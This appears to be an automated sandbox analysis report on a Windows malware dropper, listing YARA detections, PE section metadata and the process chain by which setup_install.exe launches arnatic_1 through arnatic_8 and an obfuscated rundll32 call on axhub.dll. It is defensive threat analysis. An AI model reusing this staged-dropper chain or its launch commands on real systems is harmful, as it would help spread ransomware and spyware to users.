Source: 19.3.arnatic_5.exe.3f8fd2c.80.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.3f90944.30.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.95.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.91.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.646a8c0.45.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.94.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.88.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.87.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.89.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000029.00000000.369507854.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000002B.00000000.502724798.00000222CAB20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000024.00000000.339935983.0000027CA9C70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000021.00000003.550769073.0000024B7D150000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000021.00000000.323345262.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000029.00000003.567618984.000001D91AB50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000002.680954201.0000000002F30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000002B.00000003.416182246.00000222CAAB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000021.00000003.322078967.0000024B7D060000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000002A.00000003.572017693.000002F2C5C90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000024.00000002.572434076.0000027CA9C70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000002A.00000003.386722260.000002F2C5B90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000002.686091644.0000000004960000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000029.00000003.365240878.000001D91AA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000002A.00000000.397801058.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000028.00000003.348602977.0000023342660000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000024.00000003.332963545.0000027CA9C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000028.00000003.561838327.0000023342760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000028.00000000.350690670.00000233426D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000002B.00000003.574644922.00000222CB140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: String function: 0042A1C4 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: String function: 0046E270 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: String function: 00468161 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: String function: 00401016 appears 53 times
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: String function: 00403204 appears 37 times
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: String function: 00418D80 appears 123 times

Source: appforpr2[1].exe.19.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: l7AR_7u5i2RZzKoKItslndOd.exe.19.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: qku3YiVhcZIcmDNEbDutTIoi.exe.19.dr	Static PE information: Resource name: RT_CURSOR type: COM executable for DOS

Source: CC4F.tmp.13.dr

Static PE information: No import functions for PE file found

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291491317.0000000002B50000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelibcurl.dllB vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291491317.0000000002B50000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWinPthreadGCp( vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename$ vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDTDrop.dll. vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291271193.0000000001FE0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWinPthreadGCp( vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameBear Vpn.exe4 vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoftPortal.exe6 vs 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Source: libstdc++-6.dll.1.dr	Static PE information: Section: .reloc IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: libcurl.dll.1.dr	Static PE information: Section: .reloc IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: libcurlpp.dll.1.dr	Static PE information: Section: .reloc IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ

Source: setup_install.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: libstdc++-6.dll.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: arnatic_2.txt.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: arnatic_3.txt.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: arnatic_8.txt.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: libcurl.dll.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: libcurlpp.dll.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ

Source: setup_install.exe.1.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: libstdc++-6.dll.1.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: libcurl.dll.1.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: libcurlpp.dll.1.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: setup_install.exe.1.dr	Static PE information: Section: .rdata ZLIB complexity 0.994055706522
Source: setup_install.exe.1.dr	Static PE information: Section: /4 ZLIB complexity 1.00057768486
Source: setup_install.exe.1.dr	Static PE information: Section: /91 ZLIB complexity 0.993885869565
Source: libstdc++-6.dll.1.dr	Static PE information: Section: /4 ZLIB complexity 0.99873490767
Source: libstdc++-6.dll.1.dr	Static PE information: Section: .reloc ZLIB complexity 1.00014648438
Source: arnatic_6.txt.1.dr	Static PE information: Section: !AHg.# ZLIB complexity 1.00044194799
Source: libcurl.dll.1.dr	Static PE information: Section: .rdata ZLIB complexity 0.993694196429
Source: libcurl.dll.1.dr	Static PE information: Section: .reloc ZLIB complexity 0.996710526316
Source: libcurlpp.dll.1.dr	Static PE information: Section: /4 ZLIB complexity 1.00268554688
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: Section: ZLIB complexity 1.00044194799
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: Section: ZLIB complexity 1.00537109375
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: Section: ZLIB complexity 1.00051229508
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: Section: ZLIB complexity 1.0107421875
Source: qku3YiVhcZIcmDNEbDutTIoi.exe.19.dr	Static PE information: Section: BSS ZLIB complexity 0.999471595677
Source: file3[1].exe.19.dr	Static PE information: Section: .CRT ZLIB complexity 0.999274303072
Source: zCgmVlJU85h7EoUzOQ69Wnzh.exe.19.dr	Static PE information: Section: .CRT ZLIB complexity 0.999274303072

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe

File created: C:\Users\user\Documents\smNaHML3VmWpMtzp0xKVqAGa.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@72/24@0/30

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Virustotal: Detection: 64%
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	ReversingLabs: Detection: 69%

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

File read: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Jump to behavior

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe "C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe"
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_1.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_2.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe arnatic_1.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_3.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe arnatic_2.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_4.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe arnatic_3.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_5.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe arnatic_4.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_6.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe arnatic_5.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_7.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_8.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.exe arnatic_6.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.exe arnatic_7.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.exe arnatic_8.exe
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe" -a
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rUNdlL32.eXe "C:\Users\user\AppData\Local\Temp\axhub.dll",main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rUNdlL32.eXe "C:\Users\user\AppData\Local\Temp\axhub.dll",main
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6764 -s 1092
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 1112
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe "C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\WN7mKI9_SQ4ujDwH_kKQHbe7.exe "C:\Users\user\Documents\WN7mKI9_SQ4ujDwH_kKQHbe7.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\l7AR_7u5i2RZzKoKItslndOd.exe "C:\Users\user\Documents\l7AR_7u5i2RZzKoKItslndOd.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\R2IpdvMDW3mqJjP0F3OqthCG.exe "C:\Users\user\Documents\R2IpdvMDW3mqJjP0F3OqthCG.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\duCdI76Gqz3hAbP72ldEGd_3.exe "C:\Users\user\Documents\duCdI76Gqz3hAbP72ldEGd_3.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\bCyMoheCXfvXOWdcxUFW1mSl.exe "C:\Users\user\Documents\bCyMoheCXfvXOWdcxUFW1mSl.exe"
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_8.exe	Jump to behavior
